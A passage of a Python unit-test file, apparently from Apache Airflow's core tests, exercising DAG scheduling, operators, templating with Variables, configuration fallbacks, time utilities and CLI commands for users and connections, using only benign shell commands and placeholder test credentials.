schedule_interval=delta) dag.add_task(models.BaseOperator(task_id='faketastic', owner='Also fake')) # Create and schedule the dag runs dag_runs = [] scheduler = jobs.SchedulerJob(**self.default_scheduler_args) for i in range(runs): dag_runs.append(scheduler.create_dag_run(dag)) additional_dag_run = scheduler.create_dag_run(dag) for dag_run in dag_runs: self.assertIsNotNone(dag_run) self.assertIsNone(additional_dag_run) def test_schedule_dag_no_end_date_up_to_today_only(self): """ Tests that a Dag created without an end_date can only be scheduled up to and including the current datetime. For example, if today is 2016-01-01 and we are scheduling from a start_date of 2015-01-01, only jobs up to, but not including 2016-01-01 should be scheduled. """ session = settings.Session() delta = timedelta(days=1) now = utcnow() start_date = now.subtract(weeks=1) runs = (now - start_date).days dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only', start_date=start_date, schedule_interval=delta) dag.add_task(models.BaseOperator(task_id='faketastic', owner='Also fake')) dag_runs = [] scheduler = jobs.SchedulerJob(**self.default_scheduler_args) for i in range(runs): dag_run = scheduler.create_dag_run(dag) dag_runs.append(dag_run) # Mark the DagRun as complete dag_run.state = State.SUCCESS session.merge(dag_run) session.commit() # Attempt to schedule an additional dag run (for 2016-01-01) additional_dag_run = scheduler.create_dag_run(dag) for dag_run in dag_runs: self.assertIsNotNone(dag_run) self.assertIsNone(additional_dag_run) def test_confirm_unittest_mod(self): self.assertTrue(configuration.conf.get('core', 'unit_test_mode')) def test_pickling(self): dp = self.dag.pickle() self.assertEqual(dp.pickle.dag_id, self.dag.dag_id) def test_rich_comparison_ops(self): class DAGsubclass(DAG): pass dag_eq = DAG(TEST_DAG_ID, default_args=self.args) dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args) dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args) dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args) dag_subclass_diff_name = DAGsubclass( TEST_DAG_ID + '2', default_args=self.args) for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]: d.last_loaded = self.dag.last_loaded # test identity equality self.assertEqual(self.dag, self.dag) # test dag (in)equality based on _comps self.assertEqual(dag_eq, self.dag) self.assertNotEqual(dag_diff_name, self.dag) self.assertNotEqual(dag_diff_load_time, self.dag) # test dag inequality based on type even if _comps happen to match self.assertNotEqual(dag_subclass, self.dag) # a dag should equal an unpickled version of itself d = pickle.dumps(self.dag) self.assertEqual(pickle.loads(d), self.dag) # dags are ordered based on dag_id no matter what the type is self.assertLess(self.dag, dag_diff_name) self.assertGreater(self.dag, dag_diff_load_time) self.assertLess(self.dag, dag_subclass_diff_name) # greater than should have been created automatically by functools self.assertGreater(dag_diff_name, self.dag) # hashes are non-random and match equality self.assertEqual(hash(self.dag), hash(self.dag)) self.assertEqual(hash(dag_eq), hash(self.dag)) self.assertNotEqual(hash(dag_diff_name), hash(self.dag)) self.assertNotEqual(hash(dag_subclass), hash(self.dag)) def test_check_operators(self): conn_id = "sqlite_default" captainHook = BaseHook.get_hook(conn_id=conn_id) captainHook.run("CREATE TABLE operator_test_table (a, b)") captainHook.run("insert into operator_test_table values (1,2)") t = CheckOperator( task_id='check', sql="select count(*) from operator_test_table", conn_id=conn_id, dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) t = ValueCheckOperator( task_id='value_check', pass_value=95, tolerance=0.1, conn_id=conn_id, sql="SELECT 100", dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) captainHook.run("drop table operator_test_table") def test_clear_api(self): task = self.dag_bash.tasks[0] task.clear( start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, upstream=True, downstream=True) ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE) ti.are_dependents_done() def test_illegal_args(self): """ Tests that Operators reject illegal arguments """ with warnings.catch_warnings(record=True) as w: BashOperator( task_id='test_illegal_args', bash_command='echo success', dag=self.dag, illegal_argument_1234='hello?') self.assertTrue( issubclass(w[0].category, PendingDeprecationWarning)) self.assertIn( 'Invalid arguments were passed to BashOperator.', w[0].message.args[0]) def test_bash_operator(self): t = BashOperator( task_id='test_bash_operator', bash_command="echo success", dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_bash_operator_multi_byte_output(self): t = BashOperator( task_id='test_multi_byte_bash_operator', bash_command=u"echo \u2600", dag=self.dag, output_encoding='utf-8') t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_bash_operator_kill(self): import psutil sleep_time = "100%d" % os.getpid() t = BashOperator( task_id='test_bash_operator_kill', execution_timeout=timedelta(seconds=1), bash_command="/bin/bash -c 'sleep %s'" % sleep_time, dag=self.dag) self.assertRaises( exceptions.AirflowTaskTimeout, t.run, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE) sleep(2) pid = -1 for proc in psutil.process_iter(): if proc.cmdline() == ['sleep', sleep_time]: pid = proc.pid if pid != -1: os.kill(pid, signal.SIGTERM) self.fail("BashOperator's subprocess still running after stopping on timeout!") def test_trigger_dagrun(self): def trigga(context, obj): if True: return obj t = TriggerDagRunOperator( task_id='test_trigger_dagrun', trigger_dag_id='example_bash_operator', python_callable=trigga, dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_dryrun(self): t = BashOperator( task_id='test_dryrun', bash_command="echo success", dag=self.dag) t.dry_run() def test_sqlite(self): import airflow.operators.sqlite_operator t = airflow.operators.sqlite_operator.SqliteOperator( task_id='time_sqlite', sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))", dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_timeout(self): t = PythonOperator( task_id='test_timeout', execution_timeout=timedelta(seconds=1), python_callable=lambda: sleep(5), dag=self.dag) self.assertRaises( exceptions.AirflowTaskTimeout, t.run, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_python_op(self): def test_py_op(templates_dict, ds, **kwargs): if not templates_dict['ds'] == ds: raise Exception("failure") t = PythonOperator( task_id='test_py_op', provide_context=True, python_callable=test_py_op, templates_dict={'ds': "{{ ds }}"}, dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_complex_template(self): def verify_templated_field(context): self.assertEqual(context['ti'].task.some_templated_field['bar'][1], context['ds']) t = OperatorSubclass( task_id='test_complex_template', some_templated_field={ 'foo': '123', 'bar': ['baz', '{{ ds }}'] }, dag=self.dag) t.execute = verify_templated_field t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_template_with_variable(self): """ Test the availability of variables in templates """ val = { 'test_value': 'a test value' } Variable.set("a_variable", val['test_value']) def verify_templated_field(context): self.assertEqual(context['ti'].task.some_templated_field, val['test_value']) t = OperatorSubclass( task_id='test_complex_template', some_templated_field='{{ var.value.a_variable }}', dag=self.dag) t.execute = verify_templated_field t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_template_with_json_variable(self): """ Test the availability of variables (serialized as JSON) in templates """ val = { 'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}} } Variable.set("a_variable", val['test_value'], serialize_json=True) def verify_templated_field(context): self.assertEqual(context['ti'].task.some_templated_field, val['test_value']['obj']['v2']) t = OperatorSubclass( task_id='test_complex_template', some_templated_field='{{ var.json.a_variable.obj.v2 }}', dag=self.dag) t.execute = verify_templated_field t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_template_with_json_variable_as_value(self): """ Test the availability of variables (serialized as JSON) in templates, but accessed as a value """ val = { 'test_value': {'foo': 'bar'} } Variable.set("a_variable", val['test_value'], serialize_json=True) def verify_templated_field(context): self.assertEqual(context['ti'].task.some_templated_field, u'{"foo": "bar"}') t = OperatorSubclass( task_id='test_complex_template', some_templated_field='{{ var.value.a_variable }}', dag=self.dag) t.execute = verify_templated_field t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_template_non_bool(self): """ Test templates can handle objects with no sense of truthiness """ class NonBoolObject(object): def __len__(self): return NotImplemented def __bool__(self): return NotImplemented t = OperatorSubclass( task_id='test_bad_template_obj', some_templated_field=NonBoolObject(), dag=self.dag) t.resolve_template_files() def test_task_get_template(self): TI = models.TaskInstance ti = TI( task=self.runme_0, execution_date=DEFAULT_DATE) ti.dag = self.dag_bash ti.run(ignore_ti_state=True) context = ti.get_template_context() # DEFAULT DATE is 2015-01-01 self.assertEquals(context['ds'], '2015-01-01') self.assertEquals(context['ds_nodash'], '20150101') # next_ds is 2015-01-02 as the dag interval is daily self.assertEquals(context['next_ds'], '2015-01-02') self.assertEquals(context['next_ds_nodash'], '20150102') # prev_ds is 2014-12-31 as the dag interval is daily self.assertEquals(context['prev_ds'], '2014-12-31') self.assertEquals(context['prev_ds_nodash'], '20141231') self.assertEquals(context['ts'], '2015-01-01T00:00:00+00:00') self.assertEquals(context['ts_nodash'], '20150101T000000+0000') self.assertEquals(context['yesterday_ds'], '2014-12-31') self.assertEquals(context['yesterday_ds_nodash'], '20141231') self.assertEquals(context['tomorrow_ds'], '2015-01-02') self.assertEquals(context['tomorrow_ds_nodash'], '20150102') def test_import_examples(self): self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS) def test_local_task_job(self): TI = models.TaskInstance ti = TI( task=self.runme_0, execution_date=DEFAULT_DATE) job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True) job.run() def test_raw_job(self): TI = models.TaskInstance ti = TI( task=self.runme_0, execution_date=DEFAULT_DATE) ti.dag = self.dag_bash ti.run(ignore_ti_state=True) def test_doctests(self): modules = [utils, macros] for mod in modules: failed, tests = doctest.testmod(mod) if failed: raise Exception("Failed a doctest") def test_variable_set_get_round_trip(self): Variable.set("tested_var_set_id", "Monday morning breakfast") self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id")) def test_variable_set_get_round_trip_json(self): value = {"a": 17, "b": 47} Variable.set("tested_var_set_id", value, serialize_json=True) self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True)) def test_get_non_existing_var_should_return_default(self): default_value = "some default val" self.assertEqual(default_value, Variable.get("thisIdDoesNotExist", default_var=default_value)) def test_get_non_existing_var_should_not_deserialize_json_default(self): default_value = "}{ this is a non JSON default }{" self.assertEqual(default_value, Variable.get("thisIdDoesNotExist", default_var=default_value, deserialize_json=True)) def test_variable_setdefault_round_trip(self): key = "tested_var_setdefault_1_id" value = "Monday morning breakfast in Paris" Variable.setdefault(key, value) self.assertEqual(value, Variable.get(key)) def test_variable_setdefault_round_trip_json(self): key = "tested_var_setdefault_2_id" value = {"city": 'Paris', "Hapiness": True} Variable.setdefault(key, value, deserialize_json=True) self.assertEqual(value, Variable.get(key, deserialize_json=True)) def test_variable_setdefault_existing_json(self): key = "tested_var_setdefault_2_id" value = {"city": 'Paris', "Hapiness": True} Variable.set(key, value, serialize_json=True) val = Variable.setdefault(key, value, deserialize_json=True) # Check the returned value, and the stored value are handled correctly. self.assertEqual(value, val) self.assertEqual(value, Variable.get(key, deserialize_json=True)) def test_parameterized_config_gen(self): cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG) # making sure some basic building blocks are present: self.assertIn("[core]", cfg) self.assertIn("dags_folder", cfg) self.assertIn("sql_alchemy_conn", cfg) self.assertIn("fernet_key", cfg) # making sure replacement actually happened self.assertNotIn("{AIRFLOW_HOME}", cfg) self.assertNotIn("{FERNET_KEY}", cfg) def test_config_use_original_when_original_and_fallback_are_present(self): self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY")) self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD")) FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY') configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO") FALLBACK_FERNET_KEY = configuration.conf.get( "core", "FERNET_KEY" ) self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY) # restore the conf back to the original state configuration.conf.remove_option("core", "FERNET_KEY_CMD") def test_config_throw_error_when_original_and_fallback_is_absent(self): self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY")) self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD")) FERNET_KEY = configuration.conf.get("core", "FERNET_KEY") configuration.conf.remove_option("core", "FERNET_KEY") with self.assertRaises(AirflowConfigException) as cm: configuration.conf.get("core", "FERNET_KEY") exception = str(cm.exception) message = "section/key [core/fernet_key] not found in config" self.assertEqual(message, exception) # restore the conf back to the original state configuration.conf.set("core", "FERNET_KEY", FERNET_KEY) self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY")) def test_config_override_original_when_non_empty_envvar_is_provided(self): key = "AIRFLOW__CORE__FERNET_KEY" value = "some value" self.assertNotIn(key, os.environ) os.environ[key] = value FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY') self.assertEqual(value, FERNET_KEY) # restore the envvar back to the original state del os.environ[key] def test_config_override_original_when_empty_envvar_is_provided(self): key = "AIRFLOW__CORE__FERNET_KEY" value = "" self.assertNotIn(key, os.environ) os.environ[key] = value FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY') self.assertEqual(value, FERNET_KEY) # restore the envvar back to the original state del os.environ[key] def test_round_time(self): rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1)) self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1) rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1)) self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2) rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime( 2015, 9, 14, 0, 0)) self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3) rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime( 2015, 9, 14, 0, 0)) self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4) rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime( 2015, 9, 14, 0, 0)) self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5) rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime( 2015, 9, 14, 0, 0)) self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6) def test_infer_time_unit(self): self.assertEqual('minutes', infer_time_unit([130, 5400, 10])) self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100])) self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000])) self.assertEqual('days', infer_time_unit([200000, 100000])) def test_scale_time_units(self): # use assert_almost_equal from numpy.testing since we are comparing # floating point arrays arr1 = scale_time_units([130, 5400, 10], 'minutes') assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3) arr2 = scale_time_units([110, 50, 10, 100], 'seconds') assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3) arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours') assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556], decimal=3) arr4 = scale_time_units([200000, 100000], 'days') assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3) def test_duplicate_dependencies(self): regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \ "already registered" with self.assertRaisesRegexp(AirflowException, regexp): self.runme_0.set_downstream(self.run_after_loop) with self.assertRaisesRegexp(AirflowException, regexp): self.run_after_loop.set_upstream(self.runme_0) def test_bad_trigger_rule(self): with self.assertRaises(AirflowException): DummyOperator( task_id='test_bad_trigger', trigger_rule="non_existent", dag=self.dag) def test_terminate_task(self): """If a task instance's db state get deleted, it should fail""" TI = models.TaskInstance dag = self.dagbag.dags.get('test_utils') task = dag.task_dict.get('sleeps_forever') ti = TI(task=task, execution_date=DEFAULT_DATE) job = jobs.LocalTaskJob( task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor()) # Running task instance asynchronously p = multiprocessing.Process(target=job.run) p.start() sleep(5) settings.engine.dispose() session = settings.Session() ti.refresh_from_db(session=session) # making sure it's actually running self.assertEqual(State.RUNNING, ti.state) ti = session.query(TI).filter_by( dag_id=task.dag_id, task_id=task.task_id, execution_date=DEFAULT_DATE ).one() # deleting the instance should result in a failure session.delete(ti) session.commit() # waiting for the async task to finish p.join() # making sure that the task ended up as failed ti.refresh_from_db(session=session) self.assertEqual(State.FAILED, ti.state) session.close() def test_task_fail_duration(self): """If a task fails, the duration should be recorded in TaskFail""" p = BashOperator( task_id='pass_sleepy', bash_command='sleep 3', dag=self.dag) f = BashOperator( task_id='fail_sleepy', bash_command='sleep 5', execution_timeout=timedelta(seconds=3), retry_delay=timedelta(seconds=0), dag=self.dag) session = settings.Session() try: p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) except: pass try: f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) except: pass p_fails = session.query(models.TaskFail).filter_by( task_id='pass_sleepy', dag_id=self.dag.dag_id, execution_date=DEFAULT_DATE).all() f_fails = session.query(models.TaskFail).filter_by( task_id='fail_sleepy', dag_id=self.dag.dag_id, execution_date=DEFAULT_DATE).all() print(f_fails) self.assertEqual(0, len(p_fails)) self.assertEqual(1, len(f_fails)) # C self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3) def test_dag_stats(self): """Correctly sets/dirties/cleans rows of DagStat table""" session = settings.Session() session.query(models.DagRun).delete() session.query(models.DagStat).delete() session.commit() models.DagStat.update([], session=session) self.dag_bash.create_dagrun( run_id="run1", execution_date=DEFAULT_DATE, state=State.RUNNING) models.DagStat.update([self.dag_bash.dag_id], session=session) qry = session.query(models.DagStat).all() self.assertEqual(3, len(qry)) self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id) for stats in qry: if stats.state == State.RUNNING: self.assertEqual(stats.count, 1) else: self.assertEqual(stats.count, 0) self.assertFalse(stats.dirty) self.dag_bash.create_dagrun( run_id="run2", execution_date=DEFAULT_DATE + timedelta(days=1), state=State.RUNNING) models.DagStat.update([self.dag_bash.dag_id], session=session) qry = session.query(models.DagStat).all() self.assertEqual(3, len(qry)) self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id) for stats in qry: if stats.state == State.RUNNING: self.assertEqual(stats.count, 2) else: self.assertEqual(stats.count, 0) self.assertFalse(stats.dirty) session.query(models.DagRun).first().state = State.SUCCESS session.commit() models.DagStat.update([self.dag_bash.dag_id], session=session) qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all() self.assertEqual(1, len(qry)) self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id) self.assertEqual(State.SUCCESS, qry[0].state) self.assertEqual(1, qry[0].count) self.assertFalse(qry[0].dirty) qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all() self.assertEqual(1, len(qry)) self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id) self.assertEqual(State.RUNNING, qry[0].state) self.assertEqual(1, qry[0].count) self.assertFalse(qry[0].dirty) session.query(models.DagRun).delete() session.query(models.DagStat).delete() session.commit() session.close() def test_run_command(self): if six.PY3: write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))' else: write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))' cmd = 'import sys; {0}; sys.stdout.flush()'.format(write) self.assertEqual(run_command("python -c '{0}'".format(cmd)), u'\u1000foo' if six.PY3 else 'foo') self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n') self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"') def test_trigger_dagrun_with_execution_date(self): utc_now = timezone.utcnow() run_id = 'trig__' + utc_now.isoformat() def payload_generator(context, object): object.run_id = run_id return object task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date', trigger_dag_id='example_bash_operator', python_callable=payload_generator, execution_date=utc_now, dag=self.dag) task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) dag_runs = models.DagRun.find(dag_id='example_bash_operator', run_id=run_id) self.assertEquals(len(dag_runs), 1) dag_run = dag_runs[0] self.assertEquals(dag_run.execution_date, utc_now) class CliTests(unittest.TestCase): @classmethod def setUpClass(cls): super(CliTests, cls).setUpClass() cls._cleanup() def setUp(self): super(CliTests, self).setUp() from airflow.www_rbac import app as application configuration.load_test_config() self.app, self.appbuilder = application.create_app(session=Session, testing=True) self.app.config['TESTING'] = True self.parser = cli.CLIFactory.get_parser() self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True) settings.configure_orm() self.session = Session def tearDown(self): self._cleanup(session=self.session) super(CliTests, self).tearDown() @staticmethod def _cleanup(session=None): if session is None: session = Session() session.query(models.Pool).delete() session.query(models.Variable).delete() session.commit() session.close() def test_cli_list_dags(self): args = self.parser.parse_args(['list_dags', '--report']) cli.list_dags(args) def test_cli_list_dag_runs(self): cli.trigger_dag(self.parser.parse_args([ 'trigger_dag', 'example_bash_operator', ])) args = self.parser.parse_args(['list_dag_runs', 'example_bash_operator', '--no_backfill']) cli.list_dag_runs(args) def test_cli_create_user_random_password(self): args = self.parser.parse_args([ 'users', '-c', '--username', 'test1', '--lastname', 'doe', '--firstname', 'jon', '--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password' ]) cli.users(args) def test_cli_create_user_supplied_password(self): args = self.parser.parse_args([ 'users', '-c', '--username', 'test2', '--lastname', 'doe', '--firstname', 'jon', '--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test' ]) cli.users(args) def test_cli_delete_user(self): args = self.parser.parse_args([ 'users', '-c', '--username', 'test3', '--lastname', 'doe', '--firstname', 'jon', '--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password' ]) cli.users(args) args = self.parser.parse_args([ 'users', '-d', '--username', 'test3', ]) cli.users(args) def test_cli_list_users(self): for i in range(0, 3): args = self.parser.parse_args([ 'users', '-c', '--username', 'user{}'.format(i), '--lastname', 'doe', '--firstname', 'jon', '--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer', '--use_random_password' ]) cli.users(args) with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.users(self.parser.parse_args(['users', '-l'])) stdout = mock_stdout.getvalue() for i in range(0, 3): self.assertIn('user{}'.format(i), stdout) def test_cli_sync_perm(self): # test whether sync_perm cli will throw exceptions or not args = self.parser.parse_args([ 'sync_perm' ]) cli.sync_perm(args) def test_cli_list_tasks(self): for dag_id in self.dagbag.dags.keys(): args = self.parser.parse_args(['list_tasks', dag_id]) cli.list_tasks(args) args = self.parser.parse_args([ 'list_tasks', 'example_bash_operator', '--tree']) cli.list_tasks(args) @mock.patch("airflow.bin.cli.db_utils.initdb") def test_cli_initdb(self, initdb_mock): cli.initdb(self.parser.parse_args(['initdb'])) initdb_mock.assert_called_once_with(False) @mock.patch("airflow.bin.cli.db_utils.resetdb") def test_cli_resetdb(self, resetdb_mock): cli.resetdb(self.parser.parse_args(['resetdb', '--yes'])) resetdb_mock.assert_called_once_with(False) def test_cli_connections_list(self): with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args(['connections', '--list'])) stdout = mock_stdout.getvalue() conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]] for ii, line in enumerate(stdout.split('\n')) if ii % 2 == 1] conns = [conn for conn in conns if len(conn) > 0] # Assert that some of the connections are present in the output as # expected: self.assertIn(['aws_default', 'aws'], conns) self.assertIn(['beeline_default', 'beeline'], conns) self.assertIn(['emr_default', 'emr'], conns) self.assertIn(['mssql_default', 'mssql'], conns) self.assertIn(['mysql_default', 'mysql'], conns) self.assertIn(['postgres_default', 'postgres'], conns) self.assertIn(['wasb_default', 'wasb'], conns) self.assertIn(['segment_default', 'segment'], conns) # Attempt to list connections with invalid cli args with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri', '--conn_type=fake-type', '--conn_host=fake_host', '--conn_login=fake_login', '--conn_password=fake_password', '--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra'])) stdout = mock_stdout.getvalue() # Check list attempt stdout lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ ("\tThe following args are not compatible with the " + "--list flag: ['conn_id', 'conn_uri', 'conn_extra', " + "'conn_type', 'conn_host', 'conn_login', " + "'conn_password', 'conn_schema', 'conn_port']"), ]) def test_cli_connections_list_redirect(self): cmd = ['airflow', 'connections', '--list'] with tempfile.TemporaryFile() as fp: p = subprocess.Popen(cmd, stdout=fp) p.wait() self.assertEqual(0, p.returncode) def test_cli_connections_add_delete(self): # Add connections: uri = 'postgresql://airflow:airflow@host:5432/airflow' with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_id=new1', '--conn_uri=%s' % uri])) cli.connections(self.parser.parse_args( ['connections', '-a', '--conn_id=new2', '--conn_uri=%s' % uri])) cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_id=new3', '--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"])) cli.connections(self.parser.parse_args( ['connections', '-a', '--conn_id=new4', '--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"])) cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_id=new5', '--conn_type=hive_metastore', '--conn_login=airflow', '--conn_password=airflow', '--conn_host=host', '--conn_port=9083', '--conn_schema=airflow'])) cli.connections(self.parser.parse_args( ['connections', '-a', '--conn_id=new6', '--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"])) stdout = mock_stdout.getvalue() # Check addition stdout lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ ("\tSuccessfully added `conn_id`=new1 : " + "postgresql://airflow:airflow@host:5432/airflow"), ("\tSuccessfully added `conn_id`=new2 : " + "postgresql://airflow:airflow@host:5432/airflow"), ("\tSuccessfully added `conn_id`=new3 : " + "postgresql://airflow:airflow@host:5432/airflow"), ("\tSuccessfully added `conn_id`=new4 : " + "postgresql://airflow:airflow@host:5432/airflow"), ("\tSuccessfully added `conn_id`=new5 : " + "hive_metastore://airflow:airflow@host:9083/airflow"), ("\tSuccessfully added `conn_id`=new6 : " + "google_cloud_platform://:@:") ]) # Attempt to add duplicate with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_id=new1', '--conn_uri=%s' % uri])) stdout = mock_stdout.getvalue() # Check stdout for addition attempt lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ "\tA connection with `conn_id`=new1 already exists", ]) # Attempt to add without providing conn_id with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_uri=%s' % uri])) stdout = mock_stdout.getvalue() # Check stdout for addition attempt lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ ("\tThe following args are required to add a connection:" + " ['conn_id']"), ]) # Attempt to add without providing conn_uri with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--add', '--conn_id=new'])) stdout = mock_stdout.getvalue() # Check stdout for addition attempt lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ ("\tThe following args are required to add a connection:" + " ['conn_uri or conn_type']"), ]) # Prepare to add connections session = settings.Session() extra = {'new1': None, 'new2': None, 'new3': "{'extra': 'yes'}", 'new4': "{'extra': 'yes'}"} # Add connections for index in range(1, 6): conn_id = 'new%s' % index result = (session .query(models.Connection) .filter(models.Connection.conn_id == conn_id) .first()) result = (result.conn_id, result.conn_type, result.host, result.port, result.get_extra()) if conn_id in ['new1', 'new2', 'new3', 'new4']: self.assertEqual(result, (conn_id, 'postgres', 'host', 5432, extra[conn_id])) elif conn_id == 'new5': self.assertEqual(result, (conn_id, 'hive_metastore', 'host', 9083, None)) elif conn_id == 'new6': self.assertEqual(result, (conn_id, 'google_cloud_platform', None, None, "{'extra': 'yes'}")) # Delete connections with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new1'])) cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new2'])) cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new3'])) cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new4'])) cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new5'])) cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=new6'])) stdout = mock_stdout.getvalue() # Check deletion stdout lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ "\tSuccessfully deleted `conn_id`=new1", "\tSuccessfully deleted `conn_id`=new2", "\tSuccessfully deleted `conn_id`=new3", "\tSuccessfully deleted `conn_id`=new4", "\tSuccessfully deleted `conn_id`=new5", "\tSuccessfully deleted `conn_id`=new6" ]) # Check deletions for index in range(1, 7): conn_id = 'new%s' % index result = (session.query(models.Connection) .filter(models.Connection.conn_id == conn_id) .first()) self.assertTrue(result is None) # Attempt to delete a non-existing connnection with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=fake'])) stdout = mock_stdout.getvalue() # Check deletion attempt stdout lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ "\tDid not find a connection with `conn_id`=fake", ]) # 